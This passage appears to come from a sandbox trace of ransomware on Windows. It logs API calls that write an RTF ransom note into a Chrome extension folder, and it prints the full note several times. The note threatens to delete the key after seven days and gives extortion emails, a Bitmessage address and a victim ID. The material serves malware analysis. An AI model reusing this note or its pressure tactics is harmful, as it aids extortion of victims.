ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.191] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248a258, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0289.191] WriteFile (in: hFile=0x2d4, lpBuffer=0x248a258*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248a258*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0289.192] CloseHandle (hObject=0x2d4) returned 1 [0289.192] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\#readme_eman#.rtf")) returned 0xffffffff [0289.192] GetLastError () returned 0x2 [0289.192] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\bg\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0289.195] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d 